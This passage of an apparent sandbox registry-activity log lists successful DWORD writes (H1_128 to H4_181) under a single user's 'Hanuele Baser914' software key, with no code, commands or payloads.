5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_128 Dword -1221545019 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_128 Dword -1238121919 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_128 Dword -1221549056 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_129 Dword 285445638 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_129 Dword 748622163 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_129 Dword 765223689 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_129 Dword 748619080 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_130 Dword -1176669304 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_130 Dword -1576177648 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_130 Dword -1559363375 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_130 Dword -1576180080 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_131 Dword 1790383754 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_131 Dword 393993730 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_131 Dword 377004441 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_131 Dword 393988056 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_132 Dword 535718005 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_132 Dword -1930805560 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_132 Dword -1914089631 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_132 Dword -1930811104 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_133 Dword 1297334438 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_133 Dword 39361614 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_133 Dword 56355881 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_133 Dword 39357032 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_134 Dword -1918992413 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_134 Dword 2009529995 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_134 Dword 1992658417 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_134 Dword 2009525168 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_135 Dword -1623235423 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_135 Dword -315271282 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_135 Dword -331994439 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_135 Dword -315273992 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_136 Dword -804332516 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_136 Dword 1654895272 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_136 Dword 1671481345 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_136 Dword 1654894144 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_137 Dword -237804322 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_137 Dword -669903447 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_137 Dword -653170231 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_137 Dword -669905016 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_138 Dword 382163357 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_138 Dword 1300259111 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_138 Dword 1283659409 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_138 Dword 1300263120 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_139 Dword -825283902 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_139 Dword -1024539249 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_139 Dword -1007831975 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_139 Dword -1024536040 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_140 Dword 503652153 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_140 Dword 945627170 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_140 Dword 962483489 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_140 Dword 945632096 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_141 Dword -121700353 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_141 Dword -1379172120 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_141 Dword -1396116759 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_141 Dword -1379167064 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_142 Dword 847348927 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_142 Dword 590999048 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_142 Dword 574264241 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_142 Dword 591001072 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_143 Dword 1321984617 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_143 Dword -1733803271 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_143 Dword -1716833927 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_143 Dword -1733798088 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_144 Dword 1940995669 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_144 Dword 236366607 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_144 Dword 253091521 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_144 Dword 236370048 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_145 Dword -1642068838 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_145 Dword -2088434849 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_145 Dword -2105114743 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_145 Dword -2088429112 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_146 Dword 25433668 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_146 Dword -118264277 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_146 Dword -101704367 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_146 Dword -118260976 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_147 Dword -2091402730 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_147 Dword 1851902495 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_147 Dword 1868741145 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_147 Dword 1851907160 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_148 Dword 2072664804 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_148 Dword -472896356 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_148 Dword -489464863 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_148 Dword -472892000 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_149 Dword 1200383679 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_149 Dword 1497271440 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_149 Dword 1480456361 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_149 Dword 1497276136 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_150 Dword -147274645 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_150 Dword -827516939 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_150 Dword -810654095 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_150 Dword -827523024 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_151 Dword -1915660242 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_151 Dword 1142650404 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_151 Dword 1159202617 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_151 Dword 1142645112 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_152 Dword -1370006526 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_152 Dword -1182148142 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_152 Dword -1198873471 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_152 Dword -1182154048 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_153 Dword -1074821259 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_153 Dword 788005314 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_153 Dword 804995657 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_153 Dword 788014088 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_154 Dword -1736928252 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_154 Dword -1536780474 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_154 Dword -1520049391 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_154 Dword -1536785072 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_155 Dword 1140920140 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_155 Dword 433386082 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_155 Dword 416776409 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_155 Dword 433383064 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_156 Dword -997483085 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_156 Dword -1891411358 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_156 Dword -1908399711 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_156 Dword -1891416096 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_157 Dword -370987498 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_157 Dword 78754408 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_157 Dword 95604585 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_157 Dword 78752040 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_158 Dword -602308827 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_158 Dword 2048922802 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_158 Dword 2065919025 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_158 Dword 2048920176 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_159 Dword -1304358155 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_159 Dword -275874024 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_159 Dword -292745735 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_159 Dword -275878984 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_160 Dword 301097045 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_160 Dword 1694290984 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_160 Dword 1711254337 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_160 Dword 1694289152 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_161 Dword 37378567 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_161 Dword -630507392 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_161 Dword -613922807 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_161 Dword -630510008 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_162 Dword -1405485089 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_162 Dword 1339661840 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_162 Dword 1322969553 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_162 Dword 1339658128 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_163 Dword -1766698495 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_163 Dword -985142893 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_163 Dword -1002137959 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_163 Dword -985141032 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_164 Dword -1964780442 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_164 Dword 985023863 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_164 Dword 1001731169 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_164 Dword 985027104 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_165 Dword 1806820395 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_165 Dword -1339775666 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_165 Dword -1322789591 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_165 Dword -1339772056 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_166 Dword -619161997 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_166 Dword 630392396 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_166 Dword 613446385 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_166 Dword 630396080 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_167 Dword -64181835 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_167 Dword -1694372288 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_167 Dword -1711139911 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_167 Dword -1694403080 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_168 Dword -1566203633 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_168 Dword 275760121 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_168 Dword 292335873 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_168 Dword 275765056 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_169 Dword 1618343388 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_169 Dword -2049039462 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_169 Dword -2065867063 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_169 Dword -2049034104 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_170 Dword -1111827437 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_170 Dword -78866869 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_170 Dword -95420527 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_170 Dword -78865968 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_171 Dword -480473010 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_171 Dword 1891296823 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_171 Dword 1907989849 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_171 Dword 1891302168 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_172 Dword -1834269138 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_172 Dword -433502882 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_172 Dword -416663007 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_172 Dword -433496992 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_173 Dword 1458641046 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_173 Dword 1536661430 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_173 Dword 1519705065 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_173 Dword 1536671144 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_174 Dword -1556771669 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_174 Dword -788134008 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_174 Dword -804947791 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_174 Dword -788128016 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_175 Dword -1980856852 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_175 Dword 1182047994 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_175 Dword 1199040121 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_175 Dword 1182040120 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_176 Dword 1699539923 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_176 Dword -1142751320 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_176 Dword -1159624767 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_176 Dword -1142759040 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_177 Dword -1745407334 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_177 Dword 827412608 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_177 Dword 810689673 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_177 Dword 827409096 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_178 Dword -1394363475 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_178 Dword -1497398008 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_178 Dword -1480801711 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_178 Dword -1497390064 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_179 Dword 1458140932 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_179 Dword 472784060 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_179 Dword 489513753 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_179 Dword 472778072 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_180 Dword 1052399356 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_180 Dword -1852014632 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_180 Dword -1868627743 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_180 Dword -1852021088 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_181 Dword -47490128 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_181 Dword 118149413 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_181 Dword 101294505 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_181 Dword 118147048 success or wait 1
